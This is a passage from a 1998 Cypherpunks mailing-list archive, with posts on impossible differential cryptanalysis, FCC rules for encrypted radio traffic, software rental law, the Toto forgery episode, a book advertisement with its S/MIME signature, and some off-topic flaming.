celebrates the fact that they're defecating in the pool.

They've earned the stereotype that they have.

While we're at it, maybe some of the statistics-types out there can
analyze the archives for, say, the last month. Remove postings, if any,
which are routed through an anonymous remailer at AOL. Then remove random
or systematic spam (ex: the New York Times, that Javascript
"child-molester" exploit). Then compare the number of clueless postings to
Cypherpunks by AOL users to the number of useful and on-topic postings to
Cypherpunks by AOL users, and compare that ratio against other ISPs. When
determining clueless postings, include postings which use Russo-Germanic
("<< >>") quoting, or which are completely off-topic (ex: "how u do
that"). Count postings which are clueless but were originally from another
site and got forwarded here as originating from the original site. Maybe
repeat for Juno and Hotmail. Exclude flames and subsequent discussions
concerning these clueless postings (ex: don't include AIMSX's response or
this response in either category). 

Then again, there probably isn't any need.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 11 Sep 1998 00:19:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Impossible Analysis Paper at Crypto98
Message-ID: <199809110520.HAA29692@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> There's talk of a paper given at Crypto98 on "Impossible
> Differential Analysis" which got the NSA people scribbling
> like mad taking notes as though this was something that
> had never come up at the agency and they'd better get
> right on it.
> 
> Roughly, as I heard it (and I may be way off), the premise is 
> that instead of using differential analysis for finding weaknesses 
> in a cipher, to flip that to determine what could not possibly be 
> a weakness in a cipher and build one with just those attributes.
> 
> Is this report correct, and is there a source for that paper?

This was presented at the rump session and apparently there is no paper
writeup yet.  Biham's home page at http://www.cs.technion.ac.il/~biham/
has a place you can register to be notified when new material comes out.

With conventional differential cryptanalysis, you look for pairs of inputs
which have differences (xors usually) such that after a certain number of
rounds, the ciphertexts have certain differences with excess probability.
With "impossible" differential cryptanalysis, you look for inputs with
differences which lead to ciphertext differences that are "impossible",
or at least have reduced probability.  It's the same basic idea but
you look for diminution rather than enhancement of the probability of
later differences.

Because of the reversal of the effect, the techniques for identifying
differentials, exploiting them, and designing against them are
rather different.  As a result ciphers which were designed to resist
differential cryptanalysis may be vulnerable to impossible differentials.
This technique has apparently led to an improved attack on SkipJack,
announced on Biham's web page above as "coming soon".  There was also
a moderate improvement in attacks on reduced-round IDEA (not effective
against the full number of rounds though).  At Crypto everyone was
scurrying off to see if any of the AES candidates could be knocked out
by the new technique.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Fri, 11 Sep 1998 06:18:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net
In-Reply-To: <3.0.5.32.19980909005149.0081d100@mail.xroads.com>
Message-ID: <35F90842.3D783D77@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



HyperReal-Anon wrote:

> >>>>> Soren  <sorens@workmail.com> writes:
>
>   > What about SSB?
>
>   >> FCC regulations prohibit amateur radio services from carrying
>   >> either encrypted OR commercial traffic.
>
> SSB modulation hardly counts as encryption. (?!)
> CFR 47 <http://www.fcc.gov/oet/info/rules/> says:
>
> 97.113 Prohibited transmissions.
>
> (a) No amateur station shall transmit:
>
>   (1) Communications specifically prohibited elsewhere in this part;
>
>   (2) Communications for hire or for material compensation...
>
>   (3) Communications in which the station licensee or control operator
>   has a pecuniary interest...
>
>   (4) Music using a phone emission except as specifically provided
>   elsewhere in this section; communications intended to facilitate a
>   criminal act; messages in codes or ciphers intended to obscure the
>   meaning thereof, except as otherwise provided herein; obscene or
>   indecent words or language; or false or deceptive messages, signals
>   or identification;
>
>   (5) Communications...which could reasonably be furnished
>   alternatively through other radio services.
>
> [snip]
>
> 97.117 International communications.
>
> Transmissions to a different country, where permitted, shall be made
> in plain language and shall be limited to messages of a technical
> nature relating to tests, and, to remarks of a personal character for
> which, by reason of their unimportance, recourse to the public
> telecommunications service is not justified.

  The point being that Single side band transceivers are covered by a VHF
license, and don't count as ham/amateur although the spectrum overlaps.
Morse and other archaic codes are not required. Connectivity to telephonic
land stations is available.
In the mid-80's I purchased a yacht and sailed out over the horizon.  In
the preparation stages for this I investigated the comms availability and
ran head on into the old boys/popular mechanics of the '50's crowd, that
insisted I endure their hazing ceremony and learn Morse.  Suspecting that
adding morse parsing to the deep structures of my brain would turn me into
a popular mechanic, I declined. Other alternatives existed -- one SW
solution was to type in ascii which was then translated into morse before
sending (and vice versa).  Seems several other would be Cap'n Blighs, had
the same problem.  Hence marine electronic stores started stocking SSB
transceivers, which I purchased in the form of a ham transceiver with
factory installed disabling for the US. I disabled that strap pronto, and
was able to enjoy both listening to the cruising ham tag hunters, and make
telephone calls from 5000 miles out in the Pacific (12,000 when calling
Bay of Islands net in New Zealand). I had no problem using it to discuss
work and to ship data.  Whether I was breaking the Federal Communist
Channels rules or not, I can't say.  Of course, not being a United
Socialists citizen makes this easier.  Where I come from you get the
license/call numbers when you purchase the equipment.

And while I've got your attention, on another thread entirely re:
renewable energy sources -- where I come from we use geothermal and
hydroelectric (think hoover dam), to power the country. A lot of
individuals who have steady flowing water with a good head, on their
properties, also power themselves this way.  We also use LPG and CNG to
power about 50% of our autos. I would expect that using all that
relatively cheap electricity to produce metal hydrides would make hydrogen
powered vehicles viable as well.

The Union of Socialist Americans tends to not have much in the way of
raging rivers, so there have been discussions about harnessing the moon's
energy by building tidal hydro generators.  Last I heard, the
environmentalists thought it might hurt the fishies (more than fishing for
agricultural fertilizer?), so nuclear it is.  I suspect there's more to it
than that, nuclear probably has more dick-stroking factor.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Fri, 11 Sep 1998 06:31:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Bits are Bits
In-Reply-To: <v03130304b21e7c88c3a5@[209.133.20.4]>
Message-ID: <35F90ADF.ED16F55B@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain





Tim May wrote:

> * Recorded music: OK to resell. OK to lend to private parties for
> noncommercial use. NOT OK to rent.

I've been to several public libraries which charge to borrow (rent?) music:
CDs, vinyl, tape, sheet.

How do they do that?  Is public the magic word?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 11 Sep 1998 06:47:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net
In-Reply-To: <v04011720b21e3a549335@[139.167.130.247]>
Message-ID: <v04011726b21ebb9bf6ff@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:21 AM -0400 on 9/11/98, Somebody wrote:


> Actually, SSB is a modulation/broadcast *technique*.  Used by commercial
> and ham operators.

Yeah, but there are SSB radios, with the same range as ham radios, which
are, or should be, completely legal to do encryption on, among other
commercial things.

That was my point.
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 11 Sep 1998 07:22:55 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Bits are Bits (fwd)
Message-ID: <199809111245.HAA10643@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 11 Sep 1998 00:47:03 -0700
> From: Tim May <tcmay@got.net>
> Subject: Bits are Bits

> -- rental of software is no longer allowed (court case?)...it seems to have
> ended around 1984 or so, when the software rental place near me announced
> it could no longer rent software titles

Then I won't tell you folks about Star-Tek which rents and sells software
all around the country...

As to the other stuff...

If you really think it's ok to lend your budy your CD to listen to the
newest bands out there you should call your local musicians union.

As to books and such, call a book publisher and ask for their legal
department.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Fri, 11 Sep 1998 06:44:38 +0800
To: cypherpunks@cyberpass.net
Subject: [Fwd: Course Ware Developer]
Message-ID: <35F90E95.BFF2B30A@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain

I'm busy,  anyone else want to make money educating people in London?


To: sorens@workmail.com
Subject: Course Ware Developer
From: Morven McLauchlan <mm@elanguil.demon.co.uk>
Date: Fri, 11 Sep 98 11:30:52 GMT
Reply-To: mm@elanguil.demon.co.uk

Dear Soren,
>
We are currently looking for a Course Ware Developer to produce all
documentation and slides etc for a data security course. This contract
position will involve 50 days of development split between 2 people. If
the presentation to the client is successful the successful candidates may
be required to conduct the actual training. They are looking to get someone
started as soon as possible and can interview very early next week.
>
The successful candidate will have  a proven track record of
his/her abilities and will need a very strong understanding of hardware /
software encryption. The training will be aimed at security and will be
formed around security standards already in place. A knowledge of NT, Unix
and Firewall would therefore be advantageous.
>
if you would be interested in hearing further details on this position,
please contact me on 01483 883315 or via E mail. Due to the deadline this
company are working to a speedy response is required. Don't forget you can
AIR MILES rewards by referring a friend or colleague to Elan.
>
I hope to hear from you shortly.
>

Morven McLauchlan
Elan Computing 01483 883308
Visit Elan's relaunched web site WWW.Elan.co.uk   

<end of mail message>  

Morven McLauchlan
Elan Computing 01483 883308
Visit Elan's relaunched web site WWW.Elan.co.uk   

<end of mail message> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Fri, 11 Sep 1998 06:52:24 +0800
To: cypherpunks@cyberpass.net
Subject: Replay
Message-ID: <35F91060.1DA7BFC3@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Why isn't remailer@replay.com posting to cypherpunks?  I've sent several
and none have shown up -- rants up in smoke.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sren" <sorens@homemail.com>
Date: Fri, 11 Sep 1998 07:05:54 +0800
To: cypherpunks@cyberpass.net
Subject: [Fwd: LFB Book News: EAT THE RICH]
Message-ID: <35F912F2.2C7536E@homemail.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3996.1071713798.multipart/signed"

--Boundary..3996.1071713798.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

This may be preaching to the choir,  but for anyone who doesn't know
about http://www.laissezfaire.org ...

To: booknews@laissezfaire.org
Subject: LFB Book News: EAT THE RICH
From: Russell Hanneken <russell@laissezfaire.org>
Date: Thu, 10 Sep 1998 17:31:38 -0700

=================================================================
Laissez Faire Books  -  Book News  -  September 10, 1998
Please forward this message to anyone who might be interested.
=================================================================

First 350 with autographed bookplates!

A grand slam from P. J. O'Rourke, the best political humorist
since H. L. Mencken

			  EAT THE RICH
			by P. J. O'Rourke
		 (Atlantic Monthly Press, 1998)

		    HU7872 (hardcover) 246p.
		    Publisher's price: $24.00
		    Our price normally $16.95
	  SPECIAL SALE PRICE, LIMITED TIME ONLY: $14.41

(reviewed by Jim Powell)

Everything P. J. O'Rourke writes makes you smile, but I'd rate
EAT THE RICH as his best book, better even than his super-seller
PARLIAMENT OF WHORES.  The political content is very high, and
the book is loaded with great lines.  Open to a page, any page,
and you'll soon find something wonderful--not just wit, but
passion as well.

O'Rourke offers uproarious commentary about fashionable
politicians, intellectuals and dogmas in Albania, Sweden, Cuba,
Russia, Tanzania and Shanghai as well as the United States.  
A sampler:

    "I had one fundamental question about economics: Why are some
    places prosperous and thriving while others just suck?  It's
    not a matter of brains.  No part of the earth (with the
    possible exception of Brentwood) is dumber than Beverly
    Hills, and the residents are wading in gravy.  Meanwhile in
    Russia, where chess is a spectator sport, they're boiling
    stones for soup."

    "Microeconomics concerns things that economists are
    specifically wrong about, while macroeconomics concerns
    things economists are wrong about generally.  Or, to be more
    technical, microeconomics is about money you don't have, and
    macroeconomics is about money the government is out of."

    "Government does not cause affluence.  Citizens of
    totalitarian countries have plenty of government and nothing
    of anything else."

    "And technology provides no guarantee of creature comforts.
    The most wretched locales in the world are well-supplied with
    complex and up-to-date technology--in the form of weapons."

    "Nationalization does to goods and services what divorce does
    to male parents--suddenly they're absent most of the time and
    useless the rest."

    "Altruism towards strangers is mostly a sentimental and
    fleeting thing, a small check dashed off to Save the
    Children.  Twenty billion dollars worth of it is rare.  In
    the Cold War days, of course, we were giving money to
    Tanzania on the theory of: 'Pay them to be socialist so they
    won't be communist and figure out what the difference is
    later.'  But now, I'm afraid, the ugly truth is that we care
    about Tanzanians because they have cool animals."

    "The Russian stuff is no good.  Even the smallest, simplest
    items stink.  The way you use a Russian match is: After you
    strike it, you put it back in the matchbox.  It's as likely
    to work as any of the other matches in there.  In the old
    days the soda pop tasted like soap, the soap lathered like
    toilet paper, the toilet paper could be used to sand
    furniture, the furniture was as comfortable as a pile of
    canned goods, the canned goods had the flavor of a
    Solzhenitsyn novel, and a Solzhenitsyn novel got you arrested
    if you owned one."

    "How a peaceful, uncrowded place with ample wherewithal stays
    poor is hard to explain.  How a conflict-ridden, grossly
    over-populated place with no resources whatsoever gets rich
    is simple.  The British colonial government turned Hong Kong
    into an economic miracle by doing nothing."

    "So if wealth is not a world-wide round-robin of purse
    snatching, and if the thing that makes you rich doesn't make
    me poor, why should we care about fairness at all?  We
    shouldn't."

    "If we want the whole world to be rich, we need to start
    loving wealth.  In the difference between poverty and plenty,
    the problem is the poverty and not the difference.  Wealth is
    good."

As these delightful selections suggest, nobody today has a more
gifted pen than P. J. O'Rourke.  You'll love this book.

=================================================================

EAT THE RICH
HU7872 (hardcover) 246p.
Publisher's price: $24.00
Our price normally $16.95
SPECIAL SALE PRICE, LIMITED TIME ONLY: $14.41

=================================================================

How to order from Laissez Faire Books:

SALES TAX: 

If we are shipping your order to California, you must pay sales
tax.  To learn the applicable tax rate, contact us, or point your
web browser to <http://laissezfaire.org/2order.html#tax>.

SHIPPING & HANDLING:

For destinations in the US:

  STANDARD SHIPPING (1-3 weeks):

       Merchandise total     Standard shipping price
       $ 0.00 - $24.99                $3.50
       $25.00 - $49.99                $4.50
       $50.00 - $74.99                $5.50
       $75.00 - $99.99                $6.50
       $100 and over                  FREE!

  3-DAY SHIPPING (3 business days, no PO boxes): $9 for the first
  item ($19 if destination is Alaska or Hawaii) plus $2.50 for
  each additional item.

For destinations outside the US:

  SURFACE MAIL (2-8 weeks): $4.50 for the rist item plus $1.50
  for each additional item.

Contact us for other shipping options.

PAYMENT: 

All orders must be prepaid.  Checks or money orders should be
drawn on a US bank and made payable to Laissez Faire Books.  If
paying by credit card, please include both the card number and
the expiration date.  We accept Visa, Mastercard, and Discover.

If you have placed a credit card order before, we can process
your order using the information we have on file (provided it is
up to date).  Please include your name and zip code (or postal
code) so we can find your record.

Members of the Laissez Faire Book Club can pay with funds drawn
from their account.  For more information about the Book Club,
contact us, or point your web browser to
<http://laissezfaire.org/2order.html#bookclub>.

SUBMITTING YOUR ORDER:

BY EMAIL: Address email orders to <orders@laissezfaire.org>.
PGP-encrypted mail is accepted.  For our public key, email
<russell@laissezfaire.org>, or point your web browser to
<http://laissezfaire.org/pubkey.html>.

BY MAIL: Write to Laissez Faire Books, Dept L50, 938 Howard St., 
Ste. 202, San Francisco, CA 94103-4114, USA.

BY PHONE: Call toll free 1-800-326-0996 (US and Canada) or dial 
(415) 541-9780.  Customer service representatives are available 
between 9am and 6pm PACIFIC TIME.

BY FAX: Fax us at (415) 541-0597.

If you'd like to receive our free monthly booklist, please email 
your postal address to <custsvc@laissezfaire.org>.

If you'd like to receive weekly Book News announcements via
email, or if you have any other questions or comments, please
contact Russell at <russell@laissezfaire.org>.

-----------------------------------------------------------------
Russell Hanneken                              Laissez Faire Books
russell@laissezfaire.org                 http://laissezfaire.org/





--Boundary..3996.1071713798.multipart/signed
Content-Type: application/octet-stream; name="bin00003.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00003.bin"
Content-Description: "S/MIME Cryptographic Signature"

MIIL0wYJKoZIhvcNAQcCoIILxDCCC8ACAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCCXEwggLwMIICWaADAgECAgIi8zANBgkqhkiG9w0BAQQFADCB
yDELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTEUMBIGA1UE
BxMLRHVyYmFudmlsbGUxGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMTMw
MQYDVQQLEypDZXJ0aWZpY2F0ZSBTZXJ2aWNlcyBSU0EgSUsgMTk5OC4yLjI1
IDg6MzUxOzA5BgNVBAMTMlRoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBSU0Eg
SXNzdWluZyBLZXkgMTk5OC4yLjI1MB4XDTk4MDUwNjE2MTgyOVoXDTk5MDUw
NjE2MTgyOVowWTEzMDEGA1UEAxYqVGhhd3RlIEZyZWVtYWlsIE1lbWJlciBz
b3JlbnNAaG9tZW1haWwuY29tMSIwIAYJKoZIhvcNAQkBFhNzb3JlbnNAaG9t
ZW1haWwuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8O3TicWv9
LgDIduSyVIuGiSkcS7W1/GQ3Ac7A8BBSabsPWcliDOtXrdbZyQ1wMH3zzosr
YQapAQBtDGysKhitDj+cuHBRxesLQlCIDN9F4SrFonNoIo61UGT1Dcrr6rOw
+QhjlvzsuXlbJnFAscBr+o/M8OfzITJgNgZEc1TMMwIDAQABo1cwVTAUBglg
hkgBhvhCAQEBAf8EBAMCBaAwDgYDVR0PAQH/BAQDAgWgMAwGA1UdEwEB/wQC
MAAwHwYDVR0jBBgwFqAU7TQXbg4rXkuHmJG4N6eYv5IfrHIwDQYJKoZIhvcN
AQEEBQADgYEASeu8Vv8EY8LClvwVJw/PHRTfTyMihBMwpA9Y+3ex5DijoCSd
Nrkha+gHWH932wlwboejQIQQJWDLnp9XRhTH2uqJiZyjcPHlNMQkxWp0QI9P
hhEhKfFMAWtDZH+yW2LCHmbGPWE1Jb6MTQryZKaM1fNQs4eZue+rrX2tHfEq
toQwggNIMIICsaADAgECAgEIMA0GCSqGSIb3DQEBBAUAMIHRMQswCQYDVQQG
EwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRv
d24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0
aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3dGUg
UGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFs
LWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNOTgwMjI1MDgzNTMzWhcNMDAwMjI1
MDgzNTMzWjCByDELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2Fw
ZTEUMBIGA1UEBxMLRHVyYmFudmlsbGUxGjAYBgNVBAoTEVRoYXd0ZSBDb25z
dWx0aW5nMTMwMQYDVQQLEypDZXJ0aWZpY2F0ZSBTZXJ2aWNlcyBSU0EgSUsg
MTk5OC4yLjI1IDg6MzUxOzA5BgNVBAMTMlRoYXd0ZSBQZXJzb25hbCBGcmVl
bWFpbCBSU0EgSXNzdWluZyBLZXkgMTk5OC4yLjI1MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHMcPEG5kjctJRhZVM41mS5OhsgbX0G18J5sSts0Rv
qjjXV+Swxcu6dK5MYSMkdgb42V0NiiiytCvtDbtSJPS3xUmng2P8CgSw74Eo
9+aRxk2X7pJ2JmLIYzd2PLGSD9ytUgaKccU3MWqG270IaShZ/O3HfSZn3U3e
08UC/ne24QIDAQABozcwNTASBgNVHRMBAf8ECDAGAQH/AgEAMB8GA1UdIwQY
MBagFHJJwnM0xlX0C3ZygX539IfnxrIOMA0GCSqGSIb3DQEBBAUAA4GBAELq
7YthfqHUXFKpPL2enHnoCYsSga2PHVpG7fElJlvIrv16IRbNoB47lzOD+043
KiiXpkj1KBgCJHyAe1NQtftvmvxtqlwmRagvNiJY0xsCAx/ulDnw/jRaiEsb
PYzz137Tn3BbdvbYxOK2PCSdCSWMWbHUi/P8BIIOnimGbMX/MIIDLTCCApag
AwIBAgIBADANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTATBgNV
BAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQK
ExFUaGF3dGUgQ29uc3VsdGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBT
ZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UEAxMbVGhhd3RlIFBlcnNvbmFsIEZy
ZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1mcmVlbWFpbEB0
aGF3dGUuY29tMB4XDTk2MDEwMTAwMDAwMFoXDTIwMTIzMTIzNTk1OVowgdEx
CzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcT
CUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNV
BAsTH0NlcnRpZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBgNVBAMT
G1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBDQTErMCkGCSqGSIb3DQEJARYc
cGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTCBnzANBgkqhkiG9w0BAQEF
AAOBjQAwgYkCgYEA1GnX1LCUZFtx6UfYDFG26nKRsIRefS0Nj3sS34UldSh0
OkIsYyeflXtL734Zhx2G6qPduc6WZBrCFG5ErHzmj+hND3EfQDimAKOHePb5
lIZererAXnbr2RSjXW56fAylS1V/Bhkpf56aJtVquzgkCGqYx7Hao5iR/Xnb
5VrEHLkCAwEAAaMTMBEwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQQF
AAOBgQDH7JJ+Tvj1lqVnYiqk8E0RYNBvjWBYYawmu1I1XAjPMPuoSpaKH2JC
I4wXD/S6ZJwXrEcp352YXtJsYHFcoqzceePnbgBHH7UNKOgCneSa/RP0ptl8
sfjcXyMmCZGAc9AUG95DqYMl8uacLxXK/qarigd1iwzdUYRr5PjRzneigTGC
AiowggImAgEBMIHPMIHIMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy
biBDYXBlMRQwEgYDVQQHEwtEdXJiYW52aWxsZTEaMBgGA1UEChMRVGhhd3Rl
IENvbnN1bHRpbmcxMzAxBgNVBAsTKkNlcnRpZmljYXRlIFNlcnZpY2VzIFJT
QSBJSyAxOTk4LjIuMjUgODozNTE7MDkGA1UEAxMyVGhhd3RlIFBlcnNvbmFs
IEZyZWVtYWlsIFJTQSBJc3N1aW5nIEtleSAxOTk4LjIuMjUCAiLzMAkGBSsO
AwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B
CQUxDxcNOTgwOTExMTIwOTI0WjAjBgkqhkiG9w0BCQQxFgQUoK3x976i5C/+
6sJtL8Oxg0+2ar0wUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggq
hkiG9w0DAgICAIAwBwYFKw4DAgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcN
AwICASgwDQYJKoZIhvcNAQEBBQAEgYBZWIVU8JS02MnNJIdVdOaegv22LVlg
XsPw5uF1U5SWg2YHkCP74eWmd1yr/r8EApCeJ49MZ/HxavsQLYEWC2YphW5m
6g1p0HS0ccElxkkiobh73G+9HvBjzODlya59kpTghLa1gLhp3DZSdrgXj+qL
06oRASLeP9nOmv0hURT79A==
--Boundary..3996.1071713798.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 11 Sep 1998 10:16:31 +0800
To: cypherpunks@cyberpass.net
Subject: U.S. House only has a T-1
Message-ID: <Pine.GSO.3.95.980911081636.19934C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




          http://cgi.pathfinder.com/netly/0,2326,201980911-14598,00.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s9812127@postino.up.ac.za
Date: Fri, 11 Sep 1998 02:00:03 +0800
To: Jrjeffro@aol.com
Subject: Writing skills
Message-ID: <E0zHN5O-0000jN-01@postino.up.ac.za>
MIME-Version: 1.0
Content-Type: text/plain



YoU wR1t3 l1K3 tH1s aGa1N & 1'll f1@m3 you, dickhead...
> From:          Jrjeffro@aol.com
> Date:          Wed, 9 Sep 1998 19:27:05 -0700 (PDT)
> Bcc:           

> HaCkaZ OnlY Da EliTeHelLO YaLL DiS is Da MaDD AAOOLL HaCka Ima startin a GreWp fOR HaCs Only So In OthA WerDS yA gOttA KnOw The WAreZ anD HoW toO UsEr FaTe AnD AOL So MaIl Or Im Me FoR Da TeTaIls 
f
> YeR LeeTo K Pe@CE FrOmE The LeeTs HacKJeFFrO)
> >
> 
-/"Those who desire to give up freedom in 
-/exchange for security will not have,
-/nor do they deserve, either one." - Thomas Jefferson
-/ Crayven.

-/"Those who desire to give up freedom in 
-/exchange for security will not have,
-/nor do they deserve, either one." - Thomas Jefferson
-/ Crayven.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Fri, 11 Sep 1998 08:02:51 +0800
To: cypherpunks@cyberpass.net
Subject: Freebies
Message-ID: <35F92098.F414B51E@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain

While I'm at it, here are some other entertaining and educational sites:

 Protocols
(this one is for all you conspiracy junkies)

 Revoking your SSN -or- the
proper use of form 1040

 ...
and how it works in practise (usavlong)

 Want to put your money where
your mouth is?

 World's smallest political
quiz

 ... and lets not
leave the whigs out of this ...

 Raisson d'etre


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s9813117@postino.up.ac.za
Date: Fri, 11 Sep 1998 02:14:52 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <E0zHNLN-00018f-00@postino.up.ac.za>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 11 Sep 1998 11:11:28 +0800
To: cypherpunks@cyberpass.net
Subject: RE: A Cypherpunk Trial, Yes
In-Reply-To: <D104150098E6D111B7830000F8D90AE824063F@exna02.securitydynamics.com>
Message-ID: <v03130300b21efb145e29@[209.133.20.4]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:52 AM -0700 9/11/98, Trei, Peter wrote:

>	I, too, was suprised to find myself mentioned in
>	one of the postings John Young has highlighted.  I
>	hadn't noticed this before, since Toto's rants
>	were among the 50%+ of cpunks postings I marked as
>	read without actually reading them.

As I've said, I started deleting the posts from Toto, TruthMonger, Human
Gus-Peter, Linda Reed, and other totonyms about a year ago. I did this, "in
toto," one might say. As soon as I saw a long rant with a bunch of odd
stuff, mixtures of caps, references to Country Porn, Space Aliens,
Bienfait, etc., I hit the delete button.

But before this, I saw of course that we were playing starring roles in his
fantastical rants.

And Toto often forged our names on his rants and threats. I count this as a
kind of blessing, in that any attempt to prosecute us based on our posts
will run smack into this forgery issue...at least a speed bump in the
process of proving in court that some text fragment was actually written by
someone they claim it was written by.


>
>	The Poster Currently Known As Toto mentioned an
>	awful lot of people by name, purportedly engaged
>	in all kinds of nefarious activities.  The same
>	post also names Tim May, Adam Back, Declan
>	McCullagh, Ulf Moller, Kent Crispen, and Blanc
>	Weber. I'm let off easy, being characterized
>	as only a 'terroist [sic] InterNet forger'.
>	I think that this is because I once complained
>	when someone (possibly Toto) forged a message
>	in my name. To put it in the plainest possible
>	terms: I have never in my life forged a message.

Yep. I expect several of us may get subpoenas in this case. Either to
refute what is claimed, to support what is claimed, or just to clarify who
wrote what.

I plan to rely only on my memory. If they want me to try to reconstruct my
own e-mail archives, currently resident on several different disk drives,
some on CD-ROM, some in my gun safe, some in my safe deposit box, well,
this would require much work on my part. I presume they'll pay my
consulting fees for doing this work. Otherwise, it'll be just my memory.

"No, I have no direct recollection of the post you mention...."

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 11 Sep 1998 11:31:11 +0800
To: John Young <jya@pipeline.com>
Subject: Re: U.S. House only has a T-1
In-Reply-To: <199809111556.LAA02877@dewdrop2.mindspring.com>
Message-ID: <Pine.GSO.3.95.980911092907.7166A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, let me just say this: We expect to have the document in electronic
form as early as possible. 

Also, while we're not relying on AP, the company is making the file
available on a passworded FTP site for its members. And FNS is promising
to OCR it if necessary and send it to its subscribers this evening for
$85. 

-Declan


On Fri, 11 Sep 1998, John Young wrote:

> Good piece, Declan. Is Time getting access to the restricted
> Congressional Web site which offers the Starr report early for
> members only drooling? Or are the major mediums getting
> preferential copies in concert with the deliberately under-provided
> House/Thomas/GPO rigs?
> 
> These are the four public access sites given by the NYT today,
